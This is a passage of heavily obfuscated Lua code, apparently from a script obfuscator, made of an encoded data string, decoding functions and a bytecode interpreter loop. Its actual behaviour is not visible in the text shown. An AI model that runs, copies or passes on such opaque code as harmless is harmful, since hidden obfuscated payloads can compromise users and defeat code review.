1232Lv25C26432s71s23m24E32sb32m61T28E1232Ma24C23K32SJ1S25424k32sO1S22G21w27C32f232Su21G32Mu24W24S32t01S22422832T432N426525D32T81s24d23l32nC1s22A22627W32g31m31gc31Iu32Nl24u24y32To25524l32Ts1w21o32nX2Vy23l24d32u025v25r32u425x25L32oB31l228m32of316024P32uh1S21621I32UL26Z26f32oR1S23723332uT317j1T32uX1E321J32i42np26W26C32v532M828I32IF1S25g26032Vd24s24w32vh22Q23I32Vl1s21328r28I32IZ1s26t26h32Pz1S24n25732VX27326b32w01X29F28I32JI26725f32W723i22q32WB1s22z23B32Wf1s25O25s32wJ1s23E22u32wn1s21821C32WR1S25S25O32wU1V2JM1232WZ23g22o32X222322f32Rj1S2VU32xa1S22F22332XE25u25q32xi23N24f32xM32C732s21S23a22Y32xT1g312w32M432M6315K32M9310325A24i32y522O23g32y925y25M27C2Gq32yf32mU1a310r27i2ha32mR21b2h52Gw132fH28I32mz1s23D22t29y2gb21G21h2GE32N8333s27623N23R141K26Q32oE1025Z32Tr32ng1x22I32oU27i31e42i62Ib2iD27E2if21G21j29a32GD1s23T24532Nt1X26O32OQ32Tw31Fd32OZ27I22n327t1C1Y21A2MU32gU334027o2aU21k21M2Gv1c1C1W21A1e2kJ335e2MU28I2ix1b28532Tw1s23q24A27C2Gg2iP2nE2IW2i921f21l1a334227B334927626f3300333p14334C334e1122K22l27a2HD2hf27E333v334N1232N824I25a29y27A31l42hW2h614215218151232Fn32jf32Ys22P23h32YW24b23R32Z032nh32jk32tk32Ur32mp2H9142182112iN336J15336W336Y32N832J632yW233237337832ku32kw28i32g823S24432TO24423s337d2Gb218212312N32FS1X23922c2762FS1128521R25D27227627027032t81x26R25u29Y2852Kn32tC171x22122W27C2s92i12i3338C28y21r21P2gn2Ac27e2je29X27E338S1x1k31F027O2I621g21c2hf2H028y2eh333m10192iB2KC2J1335E336m162A110335e2121D2162I52in334x339D29Y1D1d21g21d2ho1f32gP1C339m2Je2Nn2KC1H2af2CS32fS339W319031lI21727e325n33Ai33ak339U31AK313X1i339u23o2461i3190217311427E33AJ33972Ab191o1G32Ev2ls1H31Jy28I32Hk1x23i31yX27o2Eh333o2kc1k1k333O2Cj112fh1c2xA27731901133BR33bq21c24f24V27j27M1W21G1k32111X26f32j727i33Aj33bq33aV27e2FH21g2121I27J2eh21F2121l33An1H21221l1U27e1U31Ih339n192OG339r1b31Sk32fs27J33bQ33BG32mZ2cT1L32Gz29L33Bq102eH33C01L28521O2oO2E81l33cc33cE318Z31c71m33cI31rC1l2ju339W33bQ2121E28c1021321233B8339o21A33E627I1I31gQ1633dm2qB33Be2Iy2Fr23Q12335E216339Z27e21733A133ej336Z172162182G51031LK339a2Q9339c339E27j339G33aa2Jt2a51733aF33B922521x33D4339T33AM2A2339y22q33Fd2yC21f339a32Gp1X25932kq27i25l25k335E33542gH2J133a733DV335E335P1121921833a733Fw23o25L22533A72191H21p27e21k21l2Kc325n33g6335523o23T1d24824821E1E33gE1021M21n2kc26826933GK1c23o32UM33Gb1g21o27e21O33Gt2JE21H33gT32461D33DQ32o7338u338w27I2s92AU2W2335I2j11F1f33DV33a71W31rQ339w33a721233fj27E21v21U33e71922233i133eS28Y2161q21d27e31Im33f0338t251337y2Fr2fT339223B2yn1021Z21Y33id1x22a337r334B2wg32tk23O328I27O2Ip33BS2gr2IY31S82jM339O2m72ip327X319Z335E2P32772ip33J5102I627j33A721g21f2i4102AU33Jj172mV31l225l25X32Zr22i31A432Oj2mc2392Qj33bH31wq25M25y330124023W33051c322533dO1s24529P28I32p5122G92CT32Pa23W24032v92uR27c2pO33Hp21Q317527j2au33g233aR1E338r32H422S23c32Of1X2152JR1232hf33Hh27C23423531901Y21f2cS33Bi334d27C336E27m1y21c33aY2lk33L927I21e2Q11j1y31GP33ku1e1D1U1J33JH1d33jd33bt2au1c192f3339x2gH27e33HP21g21r33Eg33a721F31XV2kU29j21h21h"),(#Y-(90));local function o(e,n,...)if(e==27521776)then return(l(((n)-798272)-905468,582721));elseif(e==768839925)then return(l(l((l(n,204843))-157437,771735),970422));elseif(e==11834467)then return(l(l((l(n,581773))-744551,168627),718549));elseif(e==179934626)then return(l((l(n,312967))-126568,752960));elseif(e==579097340)then return((l(l(n,295892),576178))-560405);elseif(e==527525884)then return(l(l(l(l(n,805962),288331),16521),890775));elseif(e==187477455)then return((((n)-197329)-137087)-167915);elseif(e==877573869)then return((l(l(l(n,354277),173513),183021))-427805);elseif(e==288646430)then return(l(l(l(n,335357),914084),748936));elseif(e==34721917)then return((l(((n)-790956)-899602,264267))-331734);elseif(e==643526873)then return(((l(l(n,759637),56453))-689320)-682599);elseif(e==893249219)then return(((l(((n)-211403)-11670,188804))-968791)-574347);elseif(e==998109310)then return(l(l(l((l(n,804219))-854568,580714),808940),274337));else end;end;if _ENV then _ENV._ENV=_ENV end;local B=e[((#{(function(...)return...;end)(401,580)}+846113343))];local o=e[(159216645)];local i=e["PqLYvf"];local r=e[((#{546;853;}+533198869))];local p=e[(370022249)];local y=e[((#{755;301;847;}+662132778))];local h=e.I0CLL2O;local D=e['U2G9b2ao'];local t=e[(701905122)];local function d()local e=l(C(u,a,a),n);n=e%o;a=(a+t);return(e);end;local function c()local i,t,e,c=C(u,a,a+i);i=l(i,n);n=i%o;t=l(t,n);n=t%o;e=l(e,n);n=e%o;c=l(c,n);n=c%o;a=a+r;return((c*p)+(e*B)+(t*o)+i);end;local function i()local e,t=C(u,a,a+h);e=l(e,n);n=e%o;t=l(t,n);n=t%o;a=a+h;return((t*o)+e);end;local function r(l,e,n)if(n)then local e=(l/h^(e-t))%h^((n-t)-(e-t)+t);return(e-(e%t));else local e=h^(e-t);return(((l%(e+e)>=e)and(t))or(D));end;end;local k=""..e[y];local function b(...)return({...}),P(k,...);end;local function S(...)local L=e[(827339274)];local B=e[(478872806)];local v=e.uUXvBWo;local S=e[(481358654)];local T=e.JiZrY3CeQQ;local W=e.uEpL0;local j=e[((#{496;645;819;348;(function(...)return;end)()}+28934617))];local Y=e[((672247207-#("guys someone play Among Us with memcorrupt he is so lonely :(")))];local A=e['PqLYvf'];local k=e[((159216688-#("https://www.youtube.com/watch?v=Lrj2Hq7xqQ8")))];local y=e.r1cqs9N;local V=e['go8gB5'];local D=e["I0CLL2O"];local _=e[(221971850)];local P=e[(334076821)];local U=e[((492894815-#("psu 34567890fps, luraph 1fps, xen 0fps")))];local b=e["c2kzP"];local o=e[((#{110;(function(...)return 557,748,399,623,...;end)(522,896,616)}+701905114))];local I=e.COtNSuo1d;local p=e[(824210494)];local t=e['U2G9b2ao'];local f=e[(409837454)];local m=e[(533198871)];local F=e[(405893950)];local function E(...)local h=({});local e=({});local g=({});for e=t,c(n)-o,o do g[e]=E();end;for i=t,c(n)-o,o do local h=d(n);if(h%f==W)then local n=d(n);e[i]=(n~=t);elseif(h%f==Y)then while(true)do local c=c(n);if(c==t)then e[i]=('');break;end;if(c>S)then local t,d=(''),(s(u,a,a+c-o));a=a+c;for e=o,#d,o do local e=l(C(s(d,e,e)),n);n=e%k;t=t..x[e];end;e[i]=t;else local o,t=(''),({C(u,a,a+c-o)});a=a+c;for t,e in N(t)do local e=l(e,n);n=e%k;o=o..x[e];end;e[i]=o;end;break;end;elseif(h%f==B)then while(true)do local l=c(n);local n=c(n);local c=o;local a=(r(n,o,U)*(D^p))+l;local l=r(n,f,j);local n=((-o)^r(n,p));if(l==t)then if(a==t)then e[i]=w(n*t);break;else l=o;c=t;end;elseif(l==P)then e[i]=(a==t)and(n*(o/t))or(n*(t/t));break;end;local n=G(n,l-T)*(c+(a/(D^V)));e[i]=n%o==t and w(n)or n break;end;elseif(h%f==o)then while(true)do local n=c(n);e[i]=s(u,a,a+n-o);a=a+n;break;end;else e[i]=nil end;end;local l=c(n);for e=t,l-o,o do h[e]=({});end;for w=t,l-o,o do local l=d(n);if(l~=t)then l=l-o;local p,C,u,f,s,a=t,t,t,t,t,t;local x=r(l,o,A);if(x==o)then a=(i(n));s=(d(n));f=(c(n));elseif(x==t)then u=(i(n));a=(i(n));s=(d(n));f=(i(n));elseif(x==D)then a=(i(n));s=(d(n));f=h[(c(n))];elseif(x==B)then u=(i(n));a=(i(n));s=(d(n));f=(c(n));p=({});for e=o,u,o do p[e]=({[t]=d(n),[o]=i(n)});end;elseif(x==y)then elseif(x==A)then u=(i(n));a=(i(n));s=(d(n));f=h[(c(n))];end;if(r(l,m,m)==o)then a=e[a];end;if(r(l,_,_)==o)then C=h[c(n)];else C=h[w+o];end;if(r(l,B,B)==o)then f=e[f];end;if(r(l,y,y)==o)then u=e[u];end;if(r(l,F,F)==o)then p=({});for e=o,d(),o do p[e]=c();end;end;local e=h[w];e['SPfUPXt6aY']=f;e[I]=C;e['mjoXdcTBH']=a;e['GocnwzQt']=p;e[-L]=s;e[b]=u;end;end;local l=d(n);local n=i(n);return({[-112688.21283445797]=h;["mSdcTDIs"]=g;["U5Z"]=l;['bhrm63xxU']=t;['anBiVyU2j5']=n;[-v]=e;});end;return(E(...));end;local function C(e,d,h,...)local a=e[-95848];local c=e["U5Z"];local r=e['anBiVyU2j5'];local l=0;local s=e[-112688.21283445797];local D=e["mSdcTDIs"];return(function(...)local u=-(1);local i=956105;local x=({});local e=(true);local o=255595;local y={...};local t="SPfUPXt6aY";local p=(P(k,...)-1);local n={};local e=(989897748);local B={};local s=s[l];local F='GocnwzQt';local l="mjoXdcTBH";local w=-293769;local e=1;for e=0,p,e do if(e>=c)then B[e-c]=y[e+1];else n[e]=y[e+1];end;end;local p=p-c+1;repeat local e=s;local c=e[w];s=e[o];if(c<=31)then if(c<=15)then if(c<=7)then if(c<=3)then if(c<=1)then if(c>0)then n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];e=e[o];elseif(c<1)then local l=e[l];local a=n[l+2];local o=n[l]+a;n[l]=o;if(a>0)then if(o<=n[l+1])then s=e[t];n[l+3]=o;end;elseif(o>=n[l+1])then s=e[t];n[l+3]=o;end;end;elseif(c==2)then n[e[l]]=n[e[t]][n[e[i]]];elseif(c<=3)then n[e[l]]=d[e[t]];end;elseif(c<=5)then if(c>4)then n[e[l]]=n[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];local c=e[l];n[c](f(n,c+1,e[t]));for e=c+1,r do n[e]=nil;end;e=e[o];n[e[l]]=m(e[t]);e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];e=e[o];elseif(c<5)then local e=e[l];n[e]=n[e]();end;elseif(c>6)then local l=e[l];n[l](f(n,l+1,e[t]));for e=l+1,r do n[e]=nil;end;e=e[o];e=e[o];elseif(c<7)then local e=e[l];n[e]=n[e](n[e+1]);for e=e+1,r do n[e]=nil;end;end;elseif(c<=11)then if(c<=9)then if(c>8)then s=e[t];elseif(c<9)then local e=e[l];n[e](n[1+e]);for e=e,r do n[e]=nil;end;end;elseif(c>10)then local a=e[l];local t={};for e=1,#x,1 do local e=x[e];for l=0,#e,1 do local e=e[l];local o=e[1];local l=e[2];if((o==n)and(l>=a))then t[l]=o[l];e[1]=t;end;end;end;elseif(c<11)then local e=e[l];n[e]=n[e](f(n,e+1,u));for e=e+1,u do n[e]=nil;end;end;elseif(c<=13)then if(c>12)then local l=e[l];local o,e=b(n[l](f(n,l+1,e[t])));u=e+l-1;local e=0;for l=l,u do e=e+1;n[l]=o[e];end;elseif(c<13)then local t=D[e[t]];local c=e[F];local o={};local a=Z({},{__index=function(n,e)local e=o[e];return(e[1][e[2]]);end,__newindex=function(l,e,n)local e=o[e];e[1][e[2]]=n;end;});for l=1,e[i],1 do local e=c[l];if(e[0]==0)then o[l-1]=({n,e[1]});else o[l-1]=({d,e[1]});end;x[#x+1]=o;end;n[e[l]]=C(t,a,h);end;elseif(c>14)then e=e[o];local a=(_95);(function()n[e[l]]=(e[t]~=0);e=e[o];end){};d[e[t]]=n[e[l]];e=e[o];n[e[l]]=d[e[t]];e=e[o];do return n[e[l]]();end;e=e[o];local l=e[l];do return f(n,l,u);end;e=e[o];e=e[o];elseif(c<15)then if(n[e[l]]~=a[e[i]])then s=e[t];end;end;elseif(c<=23)then if(c<=19)then if(c<=17)then if(c>16)then n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];local c=(_68);(function()n[e[l]]=a[e[t]];e=e[o];end){};n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];local c=(_61);(function()n[e[l]]=a[e[t]];e=e[o];end){};local c=(_99);(function()n[e[l]]=a[e[t]];e=e[o];end){};local c=(_81);(function()n[e[l]]=a[e[t]];e=e[o];end){};local c=(_183);(function()n[e[l]]=a[e[t]];e=e[o];end){};n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];e=e[o];elseif(c<17)then n[e[l]]=n[e[t]]+a[e[i]];end;elseif(c==18)then local e=e[l];u=e+p-1;for l=0,p do n[e+l]=B[l];end;for e=u+1,r do n[e]=nil;end;elseif(c<=19)then local l=e[l];local t={n[l](n[l+1]);};local o=e[i];local e=0;for l=l,o do e=e+1;n[l]=t[e];end;for e=o+1,r do n[e]=nil;end;end;elseif(c<=21)then if(c>20)then n[e[l]]=m(256);elseif(c<21)then local l=e[l];n[l]=0+(n[l]);n[l+1]=0+(n[l+1]);n[l+2]=0+(n[l+2]);local o=n[l];local a=n[l+2];if(a>0)then if(o>n[l+1])then s=e[t];else n[l+3]=o;end;elseif(o<n[l+1])then s=e[t];else n[l+3]=o;end;end;elseif(c>22)then d[e[t]]=n[e[l]];elseif(c<23)then e=e[o];n[e[l]]=d[e[t]];e=e[o];do return(n[e[l]]);end;e=e[o];e=e[o];end;elseif(c<=27)then if(c<=25)then if(c>24)then e=e[o];n[e[l]]=(e[t]~=0);e=e[o];d[e[t]]=n[e[l]];e=e[o];n[e[l]]=a[e[t]];e=e[o];do return(n[e[l]]);end;e=e[o];e=e[o];elseif(c<25)then n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];e=e[o];end;elseif(c==26)then n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];e=e[o];elseif(c<=27)then n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];local c=(_18);(function()n[e[l]]=a[e[t]];e=e[o];end){};n[e[l]]=a[e[t]];e=e[o];local c=(_60);(function()n[e[l]]=a[e[t]];e=e[o];end){};n[e[l]]=a[e[t]];e=e[o];local c=(_5);(function()n[e[l]]=a[e[t]];e=e[o];end){};n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];local c=(_179);(function()n[e[l]]=a[e[t]];e=e[o];end){};n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];e=e[o];end;elseif(c<=29)then if(c>28)then n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];e=e[o];elseif(c<29)then n[e[l]]=a[e[t]];end;elseif(c==30)then n[e[l]]=n[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];local d=e[t];local c=n[d];for e=d+1,e[i]do c=c..n[e];end;n[e[l]]=c;e=e[o];local c=e[l];n[c]=n[c](n[c+1]);for e=c+1,r do n[e]=nil;end;e=e[o];local c=e[l];n[c]=n[c]();e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=h[a[e[t]]];e=e[o];n[e[l]]=h[a[e[t]]];e=e[o];n[e[l]]=n[e[t]][a[e[i]]];e=e[o];n[e[l]]=h[a[e[t]]];e=e[o];n[e[l]]=n[e[t]][a[e[i]]];e=e[o];n[e[l]]=h[a[e[t]]];e=e[o];n[e[l]]=n[e[t]][a[e[i]]];e=e[o];local a=e[l];local c,t=b(n[a](f(n,a+1,e[t])));u=t+a-1;local t=0;for e=a,u do t=t+1;n[e]=c[t];end;e=e[o];local l=e[l];n[l]=n[l](f(n,l+1,u));for e=l+1,u do n[e]=nil;end;e=e[o];e=e[o];elseif(c<=31)then n[e[l]]=n[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=h[a[e[t]]];e=e[o];n[e[l]]=h[a[e[t]]];e=e[o];local c=(_164);(function()n[e[l]]=n[e[t]][a[e[i]]];e=e[o];end){};n[e[l]]=a[e[t]];e=e[o];n[e[l]]=#n[e[t]];e=e[o];local c=e[l];n[c]=n[c](f(n,c+1,e[t]));for e=c+1,r do n[e]=nil;end;e=e[o];n[e[l]]=n[e[t]][n[e[i]]];e=e[o];local c=e[l];n[c]=n[c](n[c+1]);for e=c+1,r do n[e]=nil;end;e=e[o];n[e[l]]=a[e[t]];e=e[o];local c=e[t];local a=n[c];for e=c+1,e[i]do a=a..n[e];end;n[e[l]]=a;e=e[o];local l=e[l];n[l](f(n,l+1,e[t]));for e=l+1,r do n[e]=nil;end;e=e[o];e=e[o];end;elseif(c<=47)then if(c<=39)then if(c<=35)then if(c<=33)then if(c==32)then local l=e[l];n[l]=n[l](f(n,l+1,e[t]));for e=l+1,r do n[e]=nil;end;elseif(c<=33)then n[e[l]]=h[a[e[t]]];end;elseif(c==34)then n[e[l]]=n[e[t]][a[e[i]]];elseif(c<=35)then e=e[o];local t=e[l];u=t+p-1;for e=0,p do n[t+e]=B[e];end;for e=u+1,r do n[e]=nil;end;e=e[o];local l=e[l];do return f(n,l,u);end;e=e[o];e=e[o];end;elseif(c<=37)then if(c>36)then elseif(c<37)then do return;end;end;elseif(c>38)then n[e[l]]=d[e[t]];e=e[o];n[e[l]]=n[e[t]][a[e[i]]];e=e[o];n[e[l]]=d[e[t]];e=e[o];n[e[l]]=n[e[t]][a[e[i]]];e=e[o];n[e[l]]=d[e[t]];e=e[o];n[e[l]]=n[e[t]][a[e[i]]];e=e[o];n[e[l]]=d[e[t]];e=e[o];n[e[l]]=n[e[t]][a[e[i]]];e=e[o];n[e[l]]=d[e[t]];e=e[o];n[e[l]]=n[e[t]][a[e[i]]];e=e[o];n[e[l]]=d[e[t]];e=e[o];n[e[l]]=n[e[t]][a[e[i]]];e=e[o];n[e[l]]=d[e[t]];e=e[o];n[e[l]]=n[e[t]][a[e[i]]];e=e[o];n[e[l]]=d[e[t]];e=e[o];n[e[l]]=n[e[t]][a[e[i]]];e=e[o];n[e[l]]=d[e[t]];e=e[o];n[e[l]]=n[e[t]][a[e[i]]];e=e[o];n[e[l]]=d[e[t]];e=e[o];n[e[l]]=n[e[t]][a[e[i]]];e=e[o];local a=e[t];local t=n[a];for e=a+1,e[i]do t=t..n[e];end;n[e[l]]=t;e=e[o];do return(n[e[l]]);end;e=e[o];e=e[o];elseif(c<39)then if(not(n[e[l]]))then s=e[t];end;end;elseif(c<=43)then if(c<=41)then if(c>40)then n[e[l]]=m(e[t]);elseif(c<41)then n[e[l]]=(e[t]~=0);end;elseif(c>42)then if(n[e[l]]~=n[e[i]])then s=e[t];end;elseif(c<43)then local l=e[l];local a=e[i];local o=l+2;local l=({n[l](n[l+1],n[o]);});for e=1,a do n[o+e]=l[e];end;local l=l[1];if(l)then n[o]=l;s=e[t];end;end;elseif(c<=45)then if(c==44)then local l=e[l];local o=e[t];local a=50*(e[i]-1);local t=n[l];local e=0;for o=l+1,o do t[a+e+1]=n[l+(o-l)];e=e+1;end;elseif(c<=45)then if(n[e[l]]==a[e[i]])then s=e[t];end;end;elseif(c==46)then local c=e[l];n[c](n[1+c]);for e=c,r do n[e]=nil;end;e=e[o];n[e[l]]=h[a[e[t]]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=d[e[t]];e=e[o];n[e[l]]=n[e[t]];e=e[o];n[e[l]]=d[e[t]];e=e[o];local l=e[l];n[l](f(n,l+1,e[t]));for e=l+1,r do n[e]=nil;end;e=e[o];e=e[o];elseif(c<=47)then n[e[l]]=m(e[t]);e=e[o];n[e[l]]=a[e[t]];e=e[o];local c=(_169);(function()n[e[l]]=a[e[t]];e=e[o];end){};n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];local c=(_31);(function()n[e[l]]=a[e[t]];e=e[o];end){};n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];local c=(_129);(function()n[e[l]]=a[e[t]];e=e[o];end){};n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];local c=(_93);(function()n[e[l]]=a[e[t]];e=e[o];end){};local c=(_22);(function()n[e[l]]=a[e[t]];e=e[o];end){};n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];local c=(_87);(function()n[e[l]]=a[e[t]];e=e[o];end){};local c=(_188);(function()n[e[l]]=a[e[t]];e=e[o];end){};n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];e=e[o];end;elseif(c<=55)then if(c<=51)then if(c<=49)then if(c>48)then n[e[l]]=C(D[e[t]],(nil),h);elseif(c<49)then n[e[l]][a[e[t]]]=n[e[i]];end;elseif(c>50)then local l=e[l];n[l](f(n,l+1,e[t]));for e=l+1,r do n[e]=nil;end;elseif(c<51)then if(a[e[l]]<=n[e[i]])then s=e[t];end;end;elseif(c<=53)then if(c>52)then n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];local c=(_24);(function()n[e[l]]=a[e[t]];e=e[o];end){};n[e[l]]=a[e[t]];e=e[o];local c=(_163);(function()n[e[l]]=a[e[t]];e=e[o];end){};n[e[l]]=a[e[t]];e=e[o];local c=(_159);(function()n[e[l]]=a[e[t]];e=e[o];end){};n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];local c=(_156);(function()n[e[l]]=a[e[t]];e=e[o];end){};n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];e=e[o];elseif(c<53)then n[e[l]]=n[e[t]];end;elseif(c==54)then d[e[t]]=n[e[l]];e=e[o];n[e[l]]=d[e[t]];e=e[o];do return(n[e[l]]);end;e=e[o];e=e[o];elseif(c<=55)then n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];n[e[l]]=a[e[t]];e=e[o];e=e[o];end;elseif(c<=59)then if(c<=57)then if(c==56)then n[e[l]]=#n[e[t]];elseif(c<=57)then local e=e[l];do return f(n,e,u);end;end;elseif(c>58)then do return(n[e[l]]);end;elseif(c<59)then local c=e[l];n[c]=n[c](f(n,c+1,e[t]));for e=c+1,r do n[e]=nil;end;e=e[o];n[e[l]]=h[a[e[t]]];e=e[o];n[e[l]]=n[e[t]][n[e[i]]];e=e[o];n[e[l]]=n[e[t]];e=e[o];local l=e[l];n[l](f(n,l+1,e[t]));for e=l+1,r do n[e]=nil;end;e=e[o];e=e[o];end;elseif(c<=61)then if(c==60)then n[e[l]][n[e[t]]]=n[e[i]];elseif(c<=61)then do return n[e[l]]();end;end;elseif(c>62)then if(n[e[l]])then s=e[t];end;elseif(c<63)then local t=e[t];local o=n[t];for e=t+1,e[i]do o=o..n[e];end;n[e[l]]=o;end;until false end);end;return C(S(),{},L())(...);end)(({[((#{(function(...)return 17,907,...;end)(622,436,324)}+495108265))]=(((#{206;941;947;}+997482263)));[((110248106-#("The Voxel is sus")))]=("\58");[(704491465)]=("\108");[((#{699;19;544;49;(function(...)return 303;end)()}+478872801))]=(((#{860;(function(...)return 896,466;end)()}+2)));[(898302821)]=("\105");[(715479886)]=("\37");[((#{64;}+662132780))]=(((97417837-#("luraph is now down until further notice for an emergency major security 